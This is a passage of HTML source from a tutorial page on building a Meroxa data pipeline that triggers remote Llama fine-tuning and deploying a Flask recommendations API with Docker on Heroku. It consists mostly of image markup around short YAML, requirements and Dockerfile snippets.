    style=&quot;padding-bottom: 45.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABoElEQVR42p2RTU8TURSG+zNcSEVm2plp63x07tyv6QikUKMLE3Vn/DNSdwIxEQaFKClfSQVpJIAY3fBbTP0R2snrmZmFK5LGxZP35CTnyT3nVj5dXv8efL7KPgzPs93jS+Lif/hzdPYDw4vrn5WPJ18nL54/w/yyBFcCQgvIeHpUR4KJMHv89An2Tq/GlXTvZBInAl7gIAiacJxZmOYMDGM6TLOKO9VbGVcR3h2clsJIRmCRj+XeAnTsI5J13HNrsGyjwHZuxmmYMGvVLE400sHxr1IoGAldPHzUg0p8MGWh3bZoYI4GcuncjeRSw5zJdKJK4RYJGQ/BeYClBwnEfQs8dqFUEyFzIGV+inohrltTCNNBLmwjYi66PY1Qz6ITO4gJzm2EoQ3frxEmPC9fsXy17dwtNmg0aWXjdiY0L4XvD0eThe4i2sxDZ16DyRa4oDoJoHQIScdm3KNPaxW4fpOg9MrMe42WlXV7S9g+HI0r+1++T97sHKC/tomXr99iZTUl8pqgXFndQJ+yv5YWvFqnXC/zX72VbewOsT/6Nv4LvG1c2QKRGK4AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa http webhook processor yaml to trigger remote training&quot;
        title=&quot;&quot;
        src=&quot;/static/1f1661d3a1ee00abc5ffd546424a2d50/5a190/webhook.png&quot;
        srcset=&quot;/static/1f1661d3a1ee00abc5ffd546424a2d50/772e8/webhook.png 200w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/e17e5/webhook.png 400w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/5a190/webhook.png 800w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/c1b63/webhook.png 1200w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/29007/webhook.png 1600w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/a2ef2/webhook.png 1970w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
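&lt;p&gt;As a rough sketch, the webhook step in the pipeline configuration could look like the fragment below. The plugin name and setting keys are illustrative assumptions, and the URL is a placeholder for your own training server:&lt;/p&gt;

```yaml
# Hypothetical webhook.http processor configuration; the plugin name and
# setting keys below are illustrative and may differ from Meroxa's schema.
- id: trigger-training
  plugin: builtin:webhook.http
  settings:
    request.url: https://your-training-app.herokuapp.com/trigger-training
    request.method: POST
    request.contentType: application/json
```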
&lt;p&gt;Here’s the completed &lt;code class=&quot;language-text&quot;&gt;pipeline.yaml&lt;/code&gt; file:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/a878e/complete-pipeline.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 187.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAmCAYAAADEO7urAAAACXBIWXMAAAsTAAALEwEAmpwYAAAD6ElEQVR42q1Wy3ITVxTUjxAsad73zluah54WmAUUVfxT7FQlxCYL/EgFEuywooqwS8rL/Fmnzx1JyBg9sLPompHmTk+f0+ece1sf/vkXV5+u8e7j37i8B67+uoZwtc4vP+DF8xmqaYmyJgZFg3qOwXYUdR/DyRAX7z+i9fL0LepBjn4Rw3X2YNsP4LoP4XoP4TjfwbK2o9t9AMdt4/jiHVo/vn6DNI8wnvArowxFGSKKbSSpC6UtLuySfDMctwM/cPDz2R9o/fT6LXxlk6zAdH+IMPa5qAObX3R4dXeAqPMDm4S/LwgdKgowGPZM6FHsckF3J7KvEL5BQEKlbUOWZj4UFQf87d5VoRCGoYuqSpGmvlF3D4VzwkgIxZQUeS/kfxY83+LCBp7fXX5I7ncKudePkOUaUdTkMJiTBUzB4regcXcToXZQUt3Bkylmj0aGVBZ9fuEOIVd1ZkpH3Fb8wJdh3TGHKQo6rUPXhHpvwpoqE7rs+Z3/h1DCFmOSxL8foXSKDh0Tbr+IWNza9LGUjkDI9Ya83iCU4RAlCiXrr9+PTfnIw13V3VZ42iiUYn70eEyFmsWtESc2vDv3snZNOEUWodA+Er2HjOZIQcsL8mwVWwkVCW0OV8dpI1Uuih6HRC5z0WM+3WUZ+ab9rN0ITWewXByvjTqLUTGn0tfSNUK4KKVFT68qXU8oC7gwTRWJQuO23EtJLQhNT6tG7U6Eii/FYRNmzOkdEXESkNRj6djzQWHtptChiiLw8aSuMN6vkWUBlQbIc2UGb8y9RoeW6fXVXK43hQ9jmtKLQ77M4lbdBrpLdQLLEH7Z62tazzMjrF9GRlWgusux5cxHWIP2ElsJx2Nu9FmIJKIxLGyfyRflrtf+tsJehswHie9ikGhU7OuyztlBETQ/tmmP2eiyx9wMihyjUYlaMCyQFykj8BGm2jxfDXdt67nzwtbcmEZxREKeWcqE6eg0hhh3ra8O340hi4JEecjj2ORVHA5D2zis1O2SWWuKFG/Nk0NVx2biSGc0bq4627nl8FpC+bJsUrNZhWqYIy1io8522t+66zFk5qXLY1mvSPD02QHGswkG4z4HhM+c2QzdNq32uRa3bAE69EwOe5zYjw8mmEwrmhKx0BW3BYXhMOCVczJxTS7N1rA8BMwHhnZunhw6PDSKg3L4lJGV57ZBFMmJQSZNmynoGJg8epKKvaY65EqlL4Xw5NcrHmkL7isc/VWO6WyM4bhGReLpfs77Ps2q2JIpItZhnIY3kclVo1fm+OW392jJgf344hJHry5weHKG749PzfXw5ByHx2fm/uiV4Bw/EEdrIMfhPz9d4z9gb/sMkY/d0wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa complete pipeline yaml file&quot;
        title=&quot;&quot;
        src=&quot;/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/5a190/complete-pipeline.png&quot;
        srcset=&quot;/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/772e8/complete-pipeline.png 200w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/e17e5/complete-pipeline.png 400w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/5a190/complete-pipeline.png 800w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/c1b63/complete-pipeline.png 1200w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/29007/complete-pipeline.png 1600w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/a878e/complete-pipeline.png 2048w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
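&lt;p&gt;If you would rather copy and edit the configuration as text, a pipeline along these lines ties the pieces together. Connector and processor plugin names below are assumptions for illustration, not copied from the screenshot; substitute your own bucket names as described above:&lt;/p&gt;

```yaml
# Illustrative pipeline.yaml sketch; plugin names and setting keys are
# assumptions, not taken from the screenshot above.
version: 2.2
pipelines:
  - id: llama-finetune-pipeline
    status: running
    connectors:
      - id: s3-source
        type: source
        plugin: builtin:s3
        settings:
          aws.bucket: raw-data-bucket
        processors:
          - id: convert-to-jsonl
            plugin: custom.javascript
            settings:
              script.path: ./convert_to_jsonl.js
          - id: transform-data
            plugin: custom.javascript
            settings:
              script.path: ./transform_data.js
      - id: s3-destination
        type: destination
        plugin: builtin:s3
        settings:
          aws.bucket: processed-data-bucket
```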
&lt;hr&gt;
&lt;h2&gt;Step 3. Remote Fine-Tuning on a Training Server&lt;/h2&gt;
&lt;p&gt;When the Meroxa pipeline triggers your training server, it should load the processed JSONL data directly from S3 and begin fine-tuning the Llama model using Hugging Face’s Trainer API.&lt;/p&gt;
&lt;h3&gt;Remote Training Server Code&lt;/h3&gt;
&lt;p&gt;Below is a Flask app that exposes a &lt;code class=&quot;language-text&quot;&gt;/trigger-training&lt;/code&gt; endpoint. Upon receiving a POST request, it loads the dataset from S3 (using the &lt;code class=&quot;language-text&quot;&gt;s3fs&lt;/code&gt; support built into the &lt;code class=&quot;language-text&quot;&gt;datasets&lt;/code&gt; library), tokenizes the data, and starts fine-tuning.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3b6c0fccc0fc883431c6df525a553d61/a878e/training.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 129%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAaCAYAAAC3g3x9AAAACXBIWXMAAAsTAAALEwEAmpwYAAADjUlEQVR42qVVXW/cRBTdH0Ih8dd4/G2Px/bueptN0pLHqn+pfW2BVkWItogqpaggRCQkKuAJftnh3PEm1WaTEtSHo5n1es7ce+4917Of3/2N01//wKtffv8oCMdP7/7B7PmbM9y/dxfD2mJY9BiWHfrF/0EPO7RYH6/x8u1vmH314geYKoWO9xGrfURqD0H4GYLgUwc/uAXPvwX/Etwz/h/yXc/7BEka4el3P2L2xfNTrJoGc1uhr3O0ZYq2LdAPNWxXoawSFKVGXsSERppFDlmuoJMAKvYRRfvIywRPXr4h4benOOg7rMceB0dLrHqDg1WP+cKgrlPUTYbWFpt9ioprY3IYXirEKvZIuLdN2JNEXpaXqiZh+AFv97mGhO8OKUoyYdqHJIkoUax9t98mNBUWvcJySDDOM5KGTDUmUiJyF0TK25DtYivCL0lYUrvGlui6jNFmMF3EaKlZHjG9wgkuByXqXUJ/l7Dmoa6vnDbDvCEMSTXMEKAdFP9LeJlmcRSyLHQRpyIHiyKyaO2RUL9PWQgbin8uuKxZESArPSJAWVKCMnJpi2YSlVR42l9OmW1TVBkJNcalECu2jULfJQ4SmbUxpdAO8rvj86KIJkLtX61hUWk07dQaRR2gbgPqqGCMZtuksNTWcpVIszxw1T+PeKfKFQkNG9ewstYkJNKoTOIOTa2jqFnkihMnIYl81zJXF4Upl0zZZApjm2MxlEy9xbjqHLFo2rIDGh4QB9mGDc0L3vekv9vYVZOzkjW6oXF267m2He03r7FcWj6v3bNhMCTMGQAvSmPE8ZVFee2KYhjJSPtZEo0j7XdgKYW+cMQF/rMPSZgXifPq3ZM1Dg9XWM47pjqJf507PkzIHxWnytGdFY6Ob2O1WpCwZBNPEbq0lHeN/a4qSp3RBawyi9IYafDETZncjaipic8Hxo0iLMrJIevDJRYsgowl0UsIUlptIvUvnHGjlGWQfn5yiJOTI7ce37nN1umdMxoTX0N2zXCQlNM8dGnnhdpM5HiylTrXb++mReFwoFNsSWv1MonTzUThBCkCZ7Vc7JYl7Ltp5G8jYOEufQJq9qGViW1zNxDqOkRFXYtcczSJlp4jk4NS9W3su49VSqc5QvlSzcc5vcsKt6UbqLXsTc1qV5Qh2yB1Ft0B5ZLoevbus+/fYnZ69iceffMKDx9/jQePJjx067Np//hmEI7XZ3/hX305iG3YKLgjAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Remote training python flask code&quot;
        title=&quot;&quot;
        src=&quot;/static/3b6c0fccc0fc883431c6df525a553d61/5a190/training.png&quot;
        srcset=&quot;/static/3b6c0fccc0fc883431c6df525a553d61/772e8/training.png 200w,
/static/3b6c0fccc0fc883431c6df525a553d61/e17e5/training.png 400w,
/static/3b6c0fccc0fc883431c6df525a553d61/5a190/training.png 800w,
/static/3b6c0fccc0fc883431c6df525a553d61/c1b63/training.png 1200w,
/static/3b6c0fccc0fc883431c6df525a553d61/29007/training.png 1600w,
/static/3b6c0fccc0fc883431c6df525a553d61/a878e/training.png 2048w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Step 4. Building and Deploying the Recommendations API&lt;/h2&gt;
&lt;p&gt;After fine-tuning, you’ll serve your model via an API. The following Flask application defines a &lt;code class=&quot;language-text&quot;&gt;/recommend&lt;/code&gt; endpoint that accepts a query and returns recommendations generated by your fine-tuned Llama model.&lt;/p&gt;
&lt;h3&gt;Recommendations API Code&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/823be3db47933f88ff1c9e759c715c47/8963a/api.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 93%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAAC0klEQVR42p1UyW4TQRT0f7Ak9kzPvs/0LF7xEon9iMQXEcMBSAIIJyCRwAEUQFyQIk58WVHdxlFiBYI4lF637Kmu11X9Wp++/8Th1x949/mE9f/x/tsPfCRX6+XhMR4+uI/ZnTFG0zFuzIjpGmZ/wdYEw8kIt+7dxaujY7Qev3iDPHbguBsQxnUI8zpMawOmYDWXaHeuaHSMqxqGce0U+vf2FXi+hScv36K1vbePMolQFjGaLIJMAkgZo9stUNUpyjJBxAPjxEMY2QgCC65nUoChodaW3UaU+JjvHpBwdx9VkULmEeqeREnS0BGIUx8JoYhUzfIQQWiTpAPb6ZBkWRWpsDYRxh7me78JyzpHlikCl3B4mo0osuB5SsESnm+ewvcFq9CE9jrho53XmG6NMBw16A9qTKddjCclmpGFrO6gGYaYTAdoeAVnW1W4UOGcCvM0ojKDd+cSHtt0kMsQeeEgzRytRpFpRWu4sGWZxhj3E2xNazQDGtQIHuDBcZYqhNWG4MXbTvtywjldDmIXkWWil6XIqCzN6Gho8h5NxLFYIlEO+6et/pmQCtVGGZLRTSkTtuuhagJGJkYhWasEsgx5iP0PCkkYcVPxo16/1NlLJZVlKm/iNGvK6VVkLmn5AH64DO50NiRpjS7zGDOoq6yp4K7W/0zoBwI3b88wGfZQy4yq/XMBXkGTn1nrum6KH7oI+KwGgwZpEsJ1hQ6s63Xg+saZtk0dIc/l2jGWa/X0zsdmwfvLMawK9JpCG9B0Y/QZo7wyUXcTHfhuX/J/BU1KkbCjiM8zpYkR15YgoXrLmnBngTRW7gYoCiJXbpscBBbiMIRtq9Y2NQQ/NDhdDHFNTyPDVHVDTx0vsKEMbj1dHHKejSGprqYhVbeiqpKDoiYa7kvImkOjUSgvQAVJ5WpuPlscoXXEafv84AO2OXqU2u2d/d9YrO3/An6rOA6/nOAXuvKkuHfulUwAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Recommendations API python flask code&quot;
        title=&quot;&quot;
        src=&quot;/static/823be3db47933f88ff1c9e759c715c47/5a190/api.png&quot;
        srcset=&quot;/static/823be3db47933f88ff1c9e759c715c47/772e8/api.png 200w,
/static/823be3db47933f88ff1c9e759c715c47/e17e5/api.png 400w,
/static/823be3db47933f88ff1c9e759c715c47/5a190/api.png 800w,
/static/823be3db47933f88ff1c9e759c715c47/c1b63/api.png 1200w,
/static/823be3db47933f88ff1c9e759c715c47/29007/api.png 1600w,
/static/823be3db47933f88ff1c9e759c715c47/8963a/api.png 1918w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Step 5. Deployment with Docker and Heroku&lt;/h2&gt;
&lt;p&gt;We’ll now containerize both the training server and the recommendations API and deploy them to Heroku as separate applications, each with its own Docker image. This keeps the deployments isolated and simplifies scaling and monitoring.&lt;/p&gt;
&lt;h3&gt;Prepare Your Codebase&lt;/h3&gt;
&lt;p&gt;Assume your project repository has two subdirectories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;training/&lt;/code&gt; – contains &lt;code class=&quot;language-text&quot;&gt;training_server.py&lt;/code&gt; and its &lt;code class=&quot;language-text&quot;&gt;Dockerfile&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;recommendations/&lt;/code&gt; – contains &lt;code class=&quot;language-text&quot;&gt;app.py&lt;/code&gt; (for the recommendations API) and its &lt;code class=&quot;language-text&quot;&gt;Dockerfile&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each subdirectory has its own &lt;code class=&quot;language-text&quot;&gt;requirements.txt&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;Dockerfile&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;5.1. Create a &lt;code class=&quot;language-text&quot;&gt;requirements.txt&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;For both services, create a &lt;code class=&quot;language-text&quot;&gt;requirements.txt&lt;/code&gt; file:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 638px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/990f24ba76ea153eb1728283d547e6a6/41be6/req.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 93.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAADz0lEQVR42n2U21MTZxjG8yd0Or3gXLK75LBBrYKVgIUqQmsRyiEJFkv1poyjRcYLb2oPFw0zjiPMSEBOOQA5bTaEEEgIBwPxMP476fVe7NP3+zZ0wGovntnTt7/vfb73YErmX2vru2+h5l9zJXZeGcoV/1/ldapx1VMH76DuvimZCKKp+Tf0soj49iGimZeIZA4Mbe5/RMb36NZLxLOHUHJFfX2fB1UyEUhjO8W2CnxnihhK9ojgBUS2GPy0opkCgQ4JdMQdEYyeC3qSXCZ2CKjkjrQYi4yAk9Nz+On+OG7fe4g7YxMYGxvHz/cfnNYvDzA2PoG7Ew/pfgLeKR8LRmdgJfeqZCKbWji9x20M3BpBn1SPO1dE9PTUoeqGCNFcDUH4rySpDhUVn8A1MgIKSA/T/2S/ZCK6tprKI5jIwvXjKLpkK4Y6GtHZbYXULUOWG2B3GJJPqPGMjcA18Nwaxcr6jr6W2mWRlkzRzIEWVLNYiGxgcPgm6oRKiDaKTDJDJtntAmzHsgmwlmWXJXxeX4GB4WEsxTJ6KJmj8z0omShrml/ZwmxIxYDHgyZHNa63Sei9LOBqi4CvmgRcuSjAeV5Ag1WAxVqG2hmwEv0uN16sreuBxDYlbb9kChNwOZ7BTCCOPpcLDisBWyV86xTQ3izg2iWB33d+aTwzddAG3U4JDkslbgy6MLei6n4lw0qKgGkCxjYx44/xj2dt1ehqkdBFoKsEabtgAL4mNZ8TIJP1Mw4BX5yV6Awr0Ts4BF9Q0VlQa+m9vwm4py0R8HkZ2EyWvyPLLCIGajlvwDoososEPNdoWD+23HcSuLF7GtjLgI3VGGgXcd1pxjd0hj2tZlxrMfOzbG8yzpQBWVLq3wemGXBzz7AcIOCQYbnzkoTL9GNbk3F+7N5J1lsvGFFaTgKHCBhK6P5jy5FyUmgXnmVRqoVVtsBik7gaSMyezS7SVeTvbPQsOywwU4H3u92UlKTOKoUnhTpECyjblPok362m5jNIDXUErqFuqOUS35dYy9dUVX1KxzSIxUhaD6qsbKgOaWJoVOmYD6fw6A8vbo7e5tXPivx7l4fkPqV+t4eK+Qe+ZpjWPvr9LyyEN3TWbcSi1tsuUC/vgyXGF1LwbH4F3ul5/PnkOR5PTuFX77N/9Zj02+Q0/+adfsHXztI/S9G0ziYRsWjaZGna0KRhUS5S+7ECn1pYxdPZAJ7MLJe1VBbd+/x4Ohfka3zBOG/ZUHJHZ+Msni3SPMwVNTZ62MBcpQZnfc2StBjdICupD4p9W45v8rXsH8qDrub55C79A5SEenX+1ea7AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Requirements for the Python code&quot;
        title=&quot;&quot;
        src=&quot;/static/990f24ba76ea153eb1728283d547e6a6/41be6/req.png&quot;
        srcset=&quot;/static/990f24ba76ea153eb1728283d547e6a6/772e8/req.png 200w,
/static/990f24ba76ea153eb1728283d547e6a6/e17e5/req.png 400w,
/static/990f24ba76ea153eb1728283d547e6a6/41be6/req.png 638w&quot;
        sizes=&quot;(max-width: 638px) 100vw, 638px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
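&lt;p&gt;As a starting point, a &lt;code class=&quot;language-text&quot;&gt;requirements.txt&lt;/code&gt; along these lines covers the libraries used in this tutorial. Versions are intentionally left unpinned here; pin them to tested versions for production:&lt;/p&gt;

```text
# Illustrative requirements.txt; pin versions for production builds.
flask
gunicorn
transformers
datasets
s3fs
torch
boto3
```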
&lt;h3&gt;5.2. Create a Dockerfile for the &lt;strong&gt;Recommendations API&lt;/strong&gt; (&lt;code class=&quot;language-text&quot;&gt;recommendations/Dockerfile&lt;/code&gt;):&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ad75afbe97b62e9c991518495c6436f1/ee3fb/rec-docker.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 90.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAACjklEQVR42pWUWU8TURTH+0E0lnY6d+bemelM26G0gEQID34QTEgkERN5M2EJ1LDI0gIWA8YCiUUERNGwGJdE/Fh/z7ldiEgoPPznzMO5v7PeG3n/9Rd2SHunf/Dh5By7x79vJT6zd3quGcyKVL/8xObBCaZX1jE5X0ZhfhWFhVVM3UivUFgqY3Z1A5v7x9ghVqR69ANzr7fwMCnQ23MP0TCKWPQu4gYp3lqx2B1YdhwLaxVwcpHtwzO8WFqD65pQrgHpJCCVAWHFYIo2ba8T+yhHYGqxjO3Db4hs7p9g4uUyPCUQKAu+byNJUo5J4ARsabQESvKdmC1h6+C0BhybKyFlW8hZNrK5FNqzAVJpV1svaV+baQM4NrMEZtWBRbTbNvpMpW1HPqMzS5jRJswUtwByutw7h6SoTNcTcLin9X7aMl63hgYzpCEOKtUl4Chl2K0c9Hk+7j/Iobe3C/39Pch3hujsCuEHEkFK6SBSB7R0K1jca8e1MDp9qeS0JRB6CkHGRRj6SGc8chTI0H/Yzkrqw36gkO1Iaelepxy4SUnARb3PGjg+W4RPUTKuTZBa6bxGjo5u6pITZluzZy1L1hlKC6EQ1EMqS5ot96/llHltuhMEdQKkgzxMisxZXWQTaw6kJXCcpuzSttdK5KYb1HBa8sBCkq6k615MnXWDDEt6//Keg7BDojOv6LYI5HIK+RxPWOo+svje/guM6smPzxRrQL4uhYUyBDnHeZGpTCNB5ZKjtma0ueCNIfw3FKpucn4FWx/P6HGgz/LbHTx7PoHB4RE8GnqKgaFhDDwertnG/xVi38EnI/osM/ihibw7+o7K3jHWq5+xUtlF8U0VpY2biX35zHr1Eyr0HjLrL1SfzAAO/97mAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Dockerfile for recommendations API&quot;
        title=&quot;&quot;
        src=&quot;/static/ad75afbe97b62e9c991518495c6436f1/5a190/rec-docker.png&quot;
        srcset=&quot;/static/ad75afbe97b62e9c991518495c6436f1/772e8/rec-docker.png 200w,
/static/ad75afbe97b62e9c991518495c6436f1/e17e5/rec-docker.png 400w,
/static/ad75afbe97b62e9c991518495c6436f1/5a190/rec-docker.png 800w,
/static/ad75afbe97b62e9c991518495c6436f1/ee3fb/rec-docker.png 1144w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
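&lt;p&gt;In text form, a plausible Dockerfile for the recommendations API looks like the sketch below (the base image and module path are assumptions, not the exact file shown above):&lt;/p&gt;

```dockerfile
# recommendations/Dockerfile -- a plausible sketch, not the exact file
# shown in the screenshot; base image and module path are assumptions.
FROM python:3.11-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY . .
# Heroku injects the listening port at runtime via $PORT.
CMD gunicorn --bind 0.0.0.0:$PORT app:app
```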
&lt;h3&gt;5.2.1 Create a Dockerfile for the &lt;strong&gt;Training Server&lt;/strong&gt; (&lt;code class=&quot;language-text&quot;&gt;training/Dockerfile&lt;/code&gt;):&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/226151ceea1166cdee01a328d57ed214/ee3fb/train-docker.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 87.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC00lEQVR42pVUXU8TQRTt78BI2/3e6X7NlrbbChitDz6a+D8oaECIpWDQ8ECiMQX1ARWRCAWiBAkiJhLBf8XD8d6hlM+oPJzMndmdM+eee2dSq9v7hy3C+s7vw7Wdg8PV7avjaN++Qqq1/QsfN3bRXFxD820Ls+9WMPv+/zG30MKbxXUsfdkFESK19u0AkzNN3E8C3L0XI+gPEYU+ovgIoaSxDRXHZyHzAfxQ4MnMSzBX6tPXnxiZeAahd8GPNOhON0yTkYZBo21nYFkZNTJ4zTBOwP9lMl0YGZ8Cc6U43QePJxEYGiphiFI5RimJUChQXJLI9/gQOROeb8H3bTiuDtvROuA5Ew+NNZR1qcXP31GjicxmcTPno5gPUSQiP3AQRkKRmXYWVhunyU4T1h7VwVyKcHBsHIGeQa8jEDkWCkRo2xqll1YkvOm0suP5MdiGC4Qu+SRJURTnIKVAoRgijj0qhoArdHgepe1R2oFNqVtqzuumlYVuXEdtdPyEcIAI+zImqvke9N+6gWq1H7erfeRljN6+EnrIT0aOCIPQpcOiDmKqtEsqB84qbMDV04hIYY5O5k28mdPhWJLqSObaxbFp7nXAPrMNA+dTjrjKkY+Eqlyp5JEkkhRKNTIJ+8kb2VOOTSvT8fhCyqzQ0bsReg680KZTHaVKkipWyMrOV/avRamRwtgycIf6sBwXqXUSCKGpArCSy9rlH23TgEUKI5eqJ8g/kWunxzhqF66maWkXyC8S0qVmhXkjiyRPjZ3YqJRdhJR6qSRQToQa49gkCwyywmqnmVZXkg/QtGsYVIR0U5Y2fqi77